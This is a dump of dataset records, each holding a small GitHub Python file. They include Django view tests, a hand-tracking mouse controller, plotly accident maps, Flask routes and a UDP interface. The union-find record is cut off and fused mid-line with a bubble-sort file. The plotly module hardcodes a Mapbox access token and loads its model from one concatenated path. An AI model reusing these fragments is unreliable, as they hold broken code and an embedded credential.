def tearDown(self):\n print('----------------------除法运算,结束啦-------------------------------------')\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"chenk678/python-","sub_path":"testcase/testc10.py","file_name":"testc10.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16990562171","text":"import cv2\nimport handTrackingModule as htm\nimport numpy as np\nimport autopy\nimport time\nfrom autopy.key import *\nfrom autopy import *\n\n\ndef moveMouse():\n global prevX, prevY, currY, currX, x3, y3, x1, y1\n x3 = np.interp(x1, (0, frameReducedW), (0, wScr))\n y3 = np.interp(y1, (frameReducedH, heightCap - frameReducedH), (0, hScr))\n currX = prevX + (x3 - prevX) / smoothen\n currY = prevY + (y3 - prevY) / smoothen\n try:\n autopy.mouse.move(wScr - currX, currY)\n except ValueError:\n pass\n prevX, prevY = currX, currY\n\n\nwidthCap = 640\nheightCap = 480\ncapture = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n# capture.set(cv2.CAP_PROP_FPS, 30)\ncapture.set(3, widthCap)\ncapture.set(4, heightCap)\nprevTime = 0\ndetector = htm.handDetector(maxHands=1, detectionConfidence=0.8)\nwScr, 
hScr = autopy.screen.size()\nframeReducedW = int(widthCap / 2) + 100\nframeReducedH = 100\nsmoothen = 5\nprevX, prevY = 0, 0\nshooting = False\n\nwhile capture.isOpened():\n    global currY, currX, x3, y3, x1, y1\n    success, vid = capture.read()\n\n    hands, _ = detector.detectHands(vid)\n    locations, bbox = detector.findLocations(vid)\n\n    if len(locations):\n        x1, y1 = locations[8][1:]\n        x2, y2 = locations[12][1:]\n        cv2.rectangle(vid, (0, frameReducedH), (frameReducedW, heightCap - frameReducedH),\n                      (255, 0, 255), 2)\n\n        fingers = detector.fingersUp(hands[0])\n\n        if fingers[1] == 1 and (fingers[2] + fingers[3] + fingers[4]) == 0:\n            moveMouse()\n            if shooting:\n                autopy.mouse.toggle(autopy.mouse.Button.LEFT, down=False)\n                shooting = False\n\n        if fingers[1] + fingers[2] == 2 and fingers[3] + fingers[4] == 0:\n            # distance, vid, params = detector.findDistance(8, 12, vid)\n            autopy.mouse.toggle(autopy.mouse.Button.LEFT, down=True)  # Start Shooting\n            shooting = True\n            moveMouse()\n\n    currTime = time.time()\n    fps = 1 / (currTime - prevTime)\n    prevTime = currTime\n    cv2.putText(vid, str(int(fps) * 2), org=(20, 50), fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n                fontScale=2, color=(255, 0, 255), thickness=3)\n    cv2.imshow(\"Video\", vid)\n    cv2.waitKey(1)\n\ncapture.release()\ncv2.destroyAllWindows()\n","repo_name":"priyansh17/VirtualhandControlForGames","sub_path":"VirtualMouse.py","file_name":"VirtualMouse.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10451309442","text":"#1922 Network Connection\nimport sys\n\n# find\ndef find(arr,x):\n    if arr[x] != x:\n        return find(arr,arr[x])\n    return x\n\ndef union(arr,a,b):\n    a = find(arr,a)\n    b= find(arr,b)\n    if a other:\n                lst[i], lst[j], one, other = (other, one) * 2\n\n    return lst\n\n\nif __name__ == '__main__':\n    lst = get_random_list(0, 100, 10)\n    print(lst)\n    print(sort(lst))\n","repo_name":"urm8/ads","sub_path":"algo/sort/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"75162478133","text":"import turtle as t\n\ncolors = [\"red\", \"yellow\", \"blue\", \"green\"]\n\nt.pen()\nt.bgcolor(\"black\")\nfor x in range(100):\n    t.pencolor(colors[x % 4])\n    t.circle(x)\n    t.left(91)\nt.exitonclick()\n","repo_name":"BayanganPikiran/coder_pro-course_1-L5","sub_path":"ColorCircleSpiral/ColorCircleSpiral.py","file_name":"ColorCircleSpiral.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74164083894","text":"import shutil\nimport tempfile\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\nfrom posts.models import Comment, Follow, Group, Post\n\nUser = get_user_model()\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\nclass PostTemplateTests(TestCase):\n    @classmethod\n    def setUpClass(cls):\n        super().setUpClass()\n        shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n        cls.author = User.objects.create(username='author')\n        cls.author2 = User.objects.create(username='author2')\n        cls.group = Group.objects.create(\n            title='Группа',\n            slug='slug',\n            description='Описание группы',\n        )\n        cls.post = 
Post.objects.create(\n text='Пост',\n author=cls.author,\n group=cls.group,\n )\n cls.post2 = Post.objects.create(\n text='Пост без группы',\n author=cls.author2,\n )\n\n def setUp(self):\n self.auth_client = Client()\n self.auth_client.force_login(self.author)\n cache.clear()\n\n def test_correct_template(self):\n templates_pages_names = {\n '': 'posts/index.html',\n (\n reverse('posts:group_list', kwargs={'slug': 'slug'})\n ): 'posts/group_list.html',\n (\n reverse('posts:profile', kwargs={'username': 'author'})\n ): 'posts/profile.html',\n (\n reverse('posts:post_detail', kwargs={'post_id': self.post.pk})\n ): 'posts/post_detail.html',\n (\n reverse('posts:post_edit', kwargs={'post_id': self.post.pk})\n ): 'posts/create_post.html',\n reverse('posts:post_create'): 'posts/create_post.html',\n }\n for reverse_name, template in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.auth_client.get(reverse_name)\n self.assertTemplateUsed(response, template)\n\n def test_404_custom_page(self):\n response = self.auth_client.get('un-existing/page/')\n self.assertTemplateUsed(response, 'core/404.html')\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass PostContextTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create(username='author')\n cls.author2 = User.objects.create(username='author2')\n cls.group = Group.objects.create(\n title='Группа',\n slug='slug',\n description='Описание группы',\n )\n small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00'\n b'\\x01\\x00\\x00\\x00\\x00\\x21\\xf9\\x04'\n b'\\x01\\x0a\\x00\\x01\\x00\\x2c\\x00\\x00'\n b'\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02'\n b'\\x02\\x4c\\x01\\x00\\x3b'\n )\n uploaded = SimpleUploadedFile(\n name='small.gif',\n content=small_gif,\n content_type='image/gif'\n )\n cls.post = Post.objects.create(\n text='Пост',\n author=cls.author,\n group=cls.group,\n image=uploaded,\n )\n cls.post2 = Post.objects.create(\n text='Пост без группы',\n author=cls.author2,\n )\n Comment.objects.create(\n text='Комментарий',\n author=cls.author,\n post=cls.post\n )\n\n @classmethod\n def tearDownClass(cls):\n super(PostContextTests, cls).tearDownClass()\n cache.clear()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.auth_client = Client()\n self.auth_client.force_login(self.author)\n self.auth_client2 = Client()\n self.auth_client2.force_login(self.author2)\n cache.clear()\n\n def test_correct_context_follow(self):\n self.auth_client.post(\n reverse(\n 'posts:profile_follow',\n kwargs={'username': self.author2.username}\n )\n )\n subs1 = Follow.objects.filter(user=self.author)\n self.auth_client.post(\n reverse(\n 'posts:profile_unfollow',\n kwargs={'username': self.author2.username}\n )\n )\n subs2 = Follow.objects.filter(user=self.author)\n\n self.assertNotEqual(subs1, subs2)\n\n def test_correct_context_unique_follow(self):\n self.auth_client.post(\n reverse( # юзер1 подписывается на юезра2\n 'posts:profile_follow',\n kwargs={'username': self.author2.username}\n )\n )\n self.auth_client2.post(\n reverse( # юзер2 подписывается на юезра1\n 'posts:profile_follow',\n kwargs={'username': self.author.username}\n )\n )\n form_data = {'text': 'Text'}\n self.auth_client2.post( # юзер2 пишет пост\n reverse('posts:post_create'), data=form_data, follow=True\n )\n response1 = self.auth_client.get(reverse('posts:index'))\n post2 = response1.context['page_obj'][0] # сохраняем пост юзера2\n\n form_data = {'text': 'Текст'}\n 
self.auth_client.post( # юзер1 пишет пост\n reverse('posts:post_create'), data=form_data, follow=True\n )\n\n cache.clear()\n \"\"\"\n пользователь создаёт пост, и тут же ищет его в posts:index,\n а его там нет!\n \"\"\"\n\n response1 = self.auth_client.get(reverse('posts:index'))\n post1 = response1.context['page_obj'][0] # сохраняем пост юзера1\n\n response1 = self.auth_client.get(reverse('posts:follow_index'))\n post_follow_2 = response1.context['page_obj'][0]\n # юзер1 смотрит последний пост юзера2\n response2 = self.auth_client2.get(reverse('posts:follow_index'))\n post_follow_1 = response2.context['page_obj'][0]\n # юзер1 смотрит последний пост юзера2\n self.assertEqual(post2, post_follow_2)\n self.assertEqual(post1, post_follow_1)\n\n def test_correct_context_index(self):\n response = self.auth_client.get(reverse('posts:index'))\n\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 2)\n\n first_obj = objects[1]\n post_author_0 = first_obj.author\n post_group_0 = first_obj.group\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_group_0.title, 'Группа')\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n def test_correct_context_group_list(self):\n response = self.auth_client.get(\n reverse('posts:group_list', kwargs={'slug': 'slug'})\n )\n objects = response.context['page_obj']\n\n title_obj = response.context['group']\n self.assertEqual(title_obj, self.group)\n\n first_obj = objects[0]\n post_author_0 = first_obj.author\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n def test_correct_context_profile(self):\n response = self.auth_client.get(\n reverse('posts:profile', kwargs={'username': self.author.username})\n )\n objects = response.context['page_obj']\n\n self.assertEqual(response.context['author'], self.author)\n\n first_obj = objects[0]\n post_author_0 = first_obj.author\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n def test_correct_context_post_detail(self):\n response = self.auth_client.get(\n reverse('posts:post_detail', kwargs={'post_id': self.post.id})\n )\n\n first_obj = response.context['post']\n post_author_0 = first_obj.author\n post_text_0 = first_obj.text\n post_image_0 = first_obj.image\n self.assertEqual(post_author_0, self.author)\n self.assertEqual(post_text_0, 'Пост')\n self.assertEqual(post_image_0, 'posts/small.gif')\n\n context = response.context['comments'][0]\n comm_text = context.text\n comm_author = context.author\n self.assertEqual(comm_text, 'Комментарий')\n self.assertEqual(comm_author, self.author)\n\n def test_correct_context_post_create(self):\n response = self.auth_client.get(reverse('posts:post_create'))\n form_fields = {\n 'text': forms.fields.CharField,\n 'group': forms.models.ModelChoiceField,\n 'image': forms.fields.ImageField,\n }\n for value, expected in form_fields.items():\n with self.subTest(value=value):\n form_field = response.context['form'].fields[value]\n self.assertIsInstance(form_field, expected)\n\n def test_correct_context_post_edit(self):\n response = self.auth_client.get(\n reverse('posts:post_edit', kwargs={'post_id': 1})\n )\n form_fields = {\n 'text': 
forms.fields.CharField,\n 'group': forms.models.ModelChoiceField,\n }\n for value, expected in form_fields.items():\n with self.subTest(value=value):\n form_field = response.context['form'].fields[value]\n self.assertIsInstance(form_field, expected)\n is_edit = response.context['is_edit']\n self.assertEqual(is_edit, True)\n\n def test_cache_index(self):\n response = self.auth_client.get(reverse('posts:index'))\n posts = response.content\n Post.objects.create(\n text='Новый пост',\n author=self.author2,\n )\n response_old = self.auth_client.get(reverse('posts:index'))\n posts_old = response_old.content\n self.assertEqual(posts_old, posts)\n cache.clear()\n response_new = self.auth_client.get(reverse('posts:index'))\n posts_new = response_new.content\n self.assertNotEqual(posts_old, posts_new)\n\n\nclass PostPaginatorTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create(username='author')\n cls.author2 = User.objects.create(username='author2')\n cls.group = Group.objects.create(\n title='Группа',\n slug='slug',\n description='Описание группы',\n )\n Post.objects.create(\n text='Пост',\n author=cls.author,\n group=cls.group,\n )\n Post.objects.create(\n text='Пост без группы',\n author=cls.author2,\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n\n def setUp(self):\n self.auth_client = Client()\n self.auth_client.force_login(self.author)\n cache.clear()\n\n def test_correct_context_profile(self):\n response = self.auth_client.get(\n reverse('posts:profile', kwargs={'username': 'author'})\n )\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 1)\n\n def test_correct_context_group_list(self):\n response = self.auth_client.get(\n reverse('posts:group_list', kwargs={'slug': 'slug'})\n )\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 1)\n\n def test_correct_context_index(self):\n response = self.auth_client.get(reverse('posts:index'))\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 2)\n\n def test_many_pages(self):\n for i in range(12):\n Post.objects.create(\n text=f'Пост {i+2}',\n author=self.author,\n )\n response = self.auth_client.get(reverse('posts:index'))\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 10)\n response = self.auth_client.get('http://127.0.0.1:8000/?page=2')\n objects = response.context['page_obj']\n self.assertEqual(len(objects), 4)\n","repo_name":"Jelister203/yatube_final","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":12864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18215346152","text":"class Solution:\n def longestBeautifulSubstring(self, word: str) -> int:\n ans = 0\n count = 1\n\n l = 0\n for r in range(1, len(word)):\n curr = word[r]\n prev = word[r - 1]\n if curr >= prev:\n if curr > prev:\n count += 1\n if count == 5:\n ans = max(ans, r - l + 1)\n else:\n count = 1\n l = r\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1839. 
Longest Substring Of All Vowels in Order/1839.py","file_name":"1839.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"21787093184","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# import library\nimport pandas as pd\nimport plotly \nimport plotly.graph_objs as go \nimport json\nfrom urllib.request import urlopen\nimport plotly.express as px \nimport datetime\nfrom joblib import load\n\n\n\n\ndef data_trait():\n df = pd.read_csv('Acc_route/data/data.csv')\n df.dropna(subset=[\"annee\", \"grav\", \"sexe\", \"an_nais\", \"dep\"], inplace=True)\n df = df.astype({\n 'annee': int,\n 'dep': str,\n 'sexe': int,\n 'grav': int,\n 'an_nais': int\n })\n return df\n\ndef nb_usagers(year, departement, gender, gravity, age1, age2):\n df = data_trait()\n year_now = datetime.datetime.now().year\n df['age'] = year_now - df[\"an_nais\"]\n if age1 != 0:\n df = df[df['age'] >= age1]\n if age2 != 0:\n df = df[df['age'] <= age2]\n df = df[df['annee'] == year]\n df = df[df['dep'] == departement]\n df = df[df['sexe'] == gender] \n df = df[df['grav'] == gravity]\n df = df.groupby(by=[\"age\"])[\"grav\"].size().reset_index(name=\"count_grav\")\n df_temp = pd.DataFrame(df)\n return df_temp\n\n\n\n\ndef plot(year , departement, gender, gravity, age1, age2, name, color):\n\n df = nb_usagers(year, departement, gender, gravity, age1, age2)\n fig = go.Bar(\n x = df[\"age\"],\n y = df[\"count_grav\"],\n name = name,\n marker = dict(color = color ,\n line = dict(color ='rgb(0,0,0)',width =1.5)))\n data = [fig]\n layout = go.Layout(barmode = \"group\",\n title= \"\",\n xaxis=dict(title='Age'),\n yaxis=dict( title=\"Nombre D'usager\"))\n fig = go.Figure(data = data, layout = layout)\n graphJSON = json.dumps (fig, cls = plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n\ndef carte_france():\n\n with urlopen('https://france-geojson.gregoiredavid.fr/repo/departements.geojson') as response:\n geojson = json.load(response)\n df = data_trait()\n\n names=['code_departement', 'nom_departement', 'code_region', 'nom_region']\n df1 = pd.read_csv('Acc_route/data/departements-france.csv',\n header=None, skiprows=[0], names=names)\n\n\n df['dep'] = df['dep'].str.replace(r'\\D+', '', regex=True)\n df['dep'] = df['dep'].astype(int)\n df = df.sort_values(by='dep', ascending = True)\n\n # df['dep']=df.dep//10\n\n df1 = pd.DataFrame(df1[['code_departement','nom_departement','code_region',\n 'nom_region']])\n df1['code_departement'] = df1['code_departement'].str.lstrip('0')\n df1['code_departement'] = df1['code_departement'].str.replace(r'\\D+', '', regex=True)\n df1['code_departement'] = df1['code_departement'].astype(int)\n # df2 = pd.concat([df, df1], axis =1)\n df2 = pd.merge(df,df1, left_on='dep', right_on='code_departement', how='inner')\n\n year_now = datetime.datetime.now().year\n df2[\"age\"] = year_now - df[\"an_nais\"]\n df2 = df2.fillna(0)\n df2['age'] = df2['age'].astype(int)\n \n df3 = df2.groupby(by=[\"age\"])[\"grav\"].size().reset_index(name=\"count_grav\")\n df4 = pd.merge(df2,df3, left_on='age', right_on='age', how='inner')\n df_temp = pd.DataFrame(df4)\n return df_temp, geojson\n\n\ndef plot_carte_nb_acc():\n # Creat figure\n df, geojson = carte_france()\n fig = px.choropleth_mapbox(df,geojson= geojson\n ,color=df[\"count_grav\"]\n ,locations=df[\"dep\"]\n ,featureidkey=\"properties.code\"\n ,hover_name = df['nom_departement']\n , color_continuous_scale = [(0,\"purple\"), (1,\"red\")]\n #,color_continuous_midpoint = 
4\n                            ,range_color = (0, 2000)\n                            #,title=\"NOMBRE TOTALE D'USAGERS ACCIDENTÉS PAR DEPARTEMENT\"\n                            ,center={\"lat\": 46.3223, \"lon\": 1.2549}\n                            ,mapbox_style=\"carto-positron\", zoom=4.5)\n    fig.update_layout(margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0})\n\n    graphJSON = json.dumps (fig, cls = plotly.utils.PlotlyJSONEncoder)\n\n    return graphJSON\n\ndef plot_carte_loc():\n\n    df2, geojson = carte_france()\n    df2['lat'] = df2['lat'].apply(lambda x: str(str(x).replace(',', '.')))\n    df2['long'] = df2['long'].apply(lambda x: str(str(x).replace(',', '.')))\n    df2['lat']= df2['lat'].astype(float, errors = 'ignore')\n    df2['long'] = pd.to_numeric(df2['long'], errors='coerce').abs()\n    df2 = df2[df2['long'] != 0] \n    df2 = df2[df2['lat'] != 0]\n    df3 = df2[df2['long'] > 10]\n    df3['lat'] = df3['lat']/1000000 \n    df2[df2['long'] > 10] = df3\n    site_lat = df2['lat']\n    site_lon = df2['long']\n    locations_name = df2['nom_departement']\n    fig = go.Figure()\n    mapbox_access_token = \"pk.eyJ1IjoiaGFjaGVtMTMiLCJhIjoiY2tiZ3Jxd2hjMTJjYTJyb293MWp2ZjN6NCJ9.6zbhZNrucd-yITpe6WIYsA\"\n    fig.add_trace(go.Scattermapbox(lat=site_lat,lon=site_lon,mode='markers',marker=go.scattermapbox.Marker(size=5,color='rgb(92, 189, 231)',opacity=0. ),text=locations_name,hoverinfo='text'))\n\n    fig.add_trace(go.Scattermapbox(lat=site_lat,lon=site_lon,mode='markers', marker=go.scattermapbox.Marker(size=3, color='rgb(242, 177, 172)', opacity=0.7),hoverinfo='none'))\n\n    fig.update_layout(title='',autosize=True,hovermode='closest',showlegend=False,mapbox=dict(accesstoken=mapbox_access_token, bearing=0, center=dict( lat=46.3223, lon=1.2549), pitch=0, zoom=3.5, style='light'),)\n    graphJSON = json.dumps (fig, cls = plotly.utils.PlotlyJSONEncoder)\n    return graphJSON\n\ndef prediction(year, gender, age, localisation, intersection, lumiere, departement): \n    files = 'Acc_route/data/rfc1_prediction_1.joblib' + 'Acc_route/data/rfc1_prediction_2.joblib' + 'Acc_route/data/rfc1_prediction_3.joblib' + 'Acc_route/data/rfc1_prediction_4.joblib' \n    rfc = load(files)\n    X = [[year, gender, age, localisation, intersection, lumiere, departement]]\n    pred = rfc.predict_proba(X)\n    predict = 0\n    if pred[0][0] > pred[0][1]:\n        if pred[0][0] > 0.6:\n            predict = 1\n        else :\n            predict = 0\n    elif pred[0][0] < pred[0][1]:\n        if pred[0][1] > 0.6:\n            predict = 2\n        else:\n            predict = 0\n    return predict","repo_name":"hachemmosbah/Accidentologies","sub_path":"src/Acc_route/data_vis.py","file_name":"data_vis.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73342522611","text":"from flask import Blueprint,jsonify,request,Response\nfrom Application.models import Achat, DetailAchat,Produit,detailachat_schema,detailachats_schema,joindetailachats_schema\nfrom Application.__init__ import db\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\n\n#Creating the blueprint\ndetailachat = Blueprint('detailachat',__name__)\n\n@detailachat.route('/detailachat/get', methods =['GET'])\ndef get_detailachats():\n    detailachats= DetailAchat.query.all()\n    results = detailachats_schema.dump(detailachats)\n    return jsonify(results)\n\n\n@detailachat.route('/detailachat/getbyachat/<achat_id>' , methods = ['GET'])\ndef get_detailachat_byachatId(achat_id):\n    detailachat_to_get = DetailAchat.query.filter_by(achat_id=achat_id)\n    return detailachats_schema.jsonify(detailachat_to_get)\n\n\n\n@detailachat.route('/detailachat/add' , methods=['POST'])\ndef add_detailachat(): \n    achat_id = request.form.get('achat_id')\n    
quantite=request.form.get('quantite')\n    id_produit=request.form.get('id_produit')\n\n    \n    detailachat_to_add = DetailAchat(achat_id=achat_id,quantite=quantite,id_produit=id_produit)\n    db.session.add(detailachat_to_add)\n    db.session.commit()\n    return detailachat_schema.jsonify(detailachat_to_add)\n\n@detailachat.route('/detailachat/delete/<id>' , methods=['DELETE'] )\ndef delete_detailachat(id):\n    detailachat_to_delete = DetailAchat.query.get(id)\n    db.session.delete(detailachat_to_delete)\n    db.session.commit()\n    return \"object deleted successfully !\"\n\n@detailachat.route('/detailachat/update/<id>', methods=['PUT'])\ndef update_detailachat(id):\n    detailachat_to_update=DetailAchat.query.get(id)\n    achat_id = request.form.get('achat_id')\n    quantite=request.form.get('quantite')\n    id_produit=request.form.get('id_produit')\n    detailachat_to_update.achat_id=achat_id\n    detailachat_to_update.quantite=quantite\n    detailachat_to_update.id_produit=id_produit\n\n\n    db.session.commit()\n    return detailachat_schema.jsonify(detailachat_to_update)\n\n@detailachat.route('/detailachat/getall', methods =['GET'])\ndef get_achat_join_detailachat():\n    detailachats = DetailAchat.query.join(Achat, DetailAchat.achat_id == Achat.achat_id)\\\n        .add_columns(DetailAchat.detailachat_id,DetailAchat.achat_id,Achat.user_id, Achat.date_Achat, Achat.prix_Total_Achat,DetailAchat.id_produit,DetailAchat.quantite)\\\n        .join(Produit, DetailAchat.id_produit==Produit.id_produit)\\\n        .add_columns(Produit.nom_produit,Produit.prix_produit)\\\n        .all()\n\n    results = joindetailachats_schema.dump(detailachats)\n    return jsonify(results)\n","repo_name":"Ilyes-Cheikh/Customers-feedbacks-analytics","sub_path":"backend/Application/APIs/DetailAchat/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"72365410933","text":"import logging\n\nfrom extract import dump_tiles_from_boundary_file\n\n\n\nif __name__ == '__main__':\n    CYLS = [\n        (14, True), \n        (19, True), \n        (23, True), \n        (27, True), \n        (15, True), \n        (3, False), \n        (10, False), \n        (7, False), \n        (12, False), \n        (25, False), \n    ]\n    filename = \"Width15/6333419-halfBdry_rev.txt\"\n\n    logging.basicConfig(level=logging.INFO)\n\n    for height, bottom in CYLS:\n        with open(filename) as source_f:\n            tiles = dump_tiles_from_boundary_file(source_f, height, bottom)\n        print(\"CYL_15_%s_%d = %s\" % (\"BOTTOM\" if bottom else \"TOP\", height, tiles))\n","repo_name":"jwg4/t-tetromino","sub_path":"rh/Width13-15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18865005363","text":"#Write a python program to:\r\n# Get user input of a first name and last name\r\n# Print the names reversed, but in the same order\r\n# eg. 
Graham Smith = maharG htimS\r\n#Try to find more than one method\r\nfirstName = input('First name: ')\r\nlastName = input('Last name: ')\r\nprint(firstName,'=',firstName[::-1])\r\nprint(lastName,'=',lastName[::-1])\r\n\r\nname = input('First name and last name: ')\r\nwords = name.split(' ')\r\nfor word in words:\r\n    lastIndex = len(word) -1\r\n    for index in range(lastIndex, -1, -1):\r\n        print(word[index], end='')\r\n    print(end=' ')\r\nprint(end='\\n')\r\n\r\nname = input('First name and last name: ')\r\nfirst, last = name.split(' ')\r\nprint(first[::-1], last[::-1])","repo_name":"R1G0x/python-practice","sub_path":"Basic examples/nameReverser.py","file_name":"nameReverser.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24396683790","text":"import json\nimport shutil\nimport sys\nfrom collections import Counter\nfrom pathlib import Path\n\nfrom loguru import logger\n\nfrom src.data import DATA_DIR\nfrom src.utils.io import read_json\n\n\nclass OrganizeFiles:\n    \"\"\"This class is used to clean a directory based on file extensions\"\"\"\n    def __init__(self):\n        ext_dirs = read_json(DATA_DIR / 'extensions.json')\n        self.extensions_dest = {}\n        for dir_name, ext_list in ext_dirs.items():\n            for ext in ext_list:\n                self.extensions_dest[ext] = dir_name\n\n    def __call__(self, directory):\n        \"\"\"Organize files in a directory by moving them to their respective directories\"\"\"\n\n        directory = Path(directory)\n        if not directory.exists():\n            raise FileNotFoundError(\"The directory does not exist\")\n        logger.info(f\"Organizing the files in the {directory}...\")\n        for file_path in directory.iterdir():\n            # ignore directories\n            if file_path.is_dir():\n                continue\n            # ignore hidden files\n            if file_path.name.startswith('.'):\n                continue\n\n            if file_path.suffix not in self.extensions_dest:\n                DEST_DIR = directory / 'others'\n            else:\n                # make the destination directory\n                DEST_DIR = directory / self.extensions_dest[file_path.suffix]\n            DEST_DIR.mkdir(exist_ok=True)\n            logger.info(f\"Moving {file_path} to {DEST_DIR}\")\n            shutil.move(str(file_path), str(DEST_DIR))\n\nif __name__ == \"__main__\":\n    org_files = OrganizeFiles()\n    org_files(sys.argv[1])\n    logger.info(\"Done!\")\n","repo_name":"saeed-at/Clean_Directory","sub_path":"src/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20785382828","text":"\nimport re\nimport sys\nimport struct\nimport socket\nfrom typing import ByteString\n\ncontroltronic_address = \"224.0.43.54\"\ncontroltronic_port = 43541\n\ndef controltronicSocket(address: str, port: int) -> socket.socket:\n    # Open the udp multicast socket\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n    s.settimeout(0.025)\n    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    if sys.platform == 'win32':\n        s.bind(('', port))\n    else:\n        s.bind((address, port))\n    mreq = struct.pack(\"4sl\", socket.inet_aton(address), socket.INADDR_ANY)\n    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n    s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 5)\n    return s\n\n# Splits UDP payload data into a stream of controltronic packets\n# Each packet starts with b'CT' and ends with b'\\n'\ndef split_data(data: bytes):\n    for match in re.finditer(br\"CT.+?\\n(?=(C|\\Z))\", data, re.DOTALL):\n        yield match.group(0)\n\nclass 
UdpInterface:\n\n def __init__(self, address: str = controltronic_address, port: int = controltronic_port) -> None:\n self.address = address\n self.port = port\n self.socket = controltronicSocket( address, port )\n\n def peek(self, len: int = 10240, timeout: int = 0.025) -> ByteString:\n self.socket.settimeout(timeout)\n return self.socket.recv(len, socket.MSG_PEEK)\n\n def read(self, len: int = 10240, timeout: int = 0.025) -> ByteString:\n try:\n self.socket.settimeout(timeout)\n #print(f\"Buffer now has: \" + str(self.peek()))\n return self.socket.recv(len)\n except socket.timeout as e:\n raise TimeoutError() from e\n\n def write(self, data: ByteString) -> None:\n if isinstance(data, bytes) or isinstance(data, ByteString):\n bytes_data = data\n elif isinstance(data, list):\n bytes_data = bytes(data)\n else:\n raise NotImplementedError()\n \n self.socket.sendto(bytes_data, (self.address, self.port))\n # Drain the socket of what we just sent\n rxData = self.peek(len(bytes_data))\n if rxData == bytes_data:\n self.read(len(bytes_data))\n","repo_name":"AODtorusan/screentronic","sub_path":"src/screentronic/UdpInterface.py","file_name":"UdpInterface.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12399630712","text":"import pytest\nfrom campcleanup import CampCleanup\n\n@pytest.mark.parametrize(\"assignmentPair, expected\", [\n (\"2-4,6-8\", [[\"2\",\"3\",\"4\"], [\"6\",\"7\",\"8\"]]),\n (\"2-3,4-5\", [[\"2\",\"3\"], [\"4\",\"5\"]]),\n (\"5-7,7-9\", [[\"5\",\"6\",\"7\"], [\"7\",\"8\",\"9\"]]),\n (\"2-8,3-7\", [[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\"], [\"3\",\"4\",\"5\",\"6\",\"7\"]]),\n (\"6-6,4-6\", [[\"6\"], [\"4\",\"5\",\"6\"]]),\n (\"2-6,4-8\", 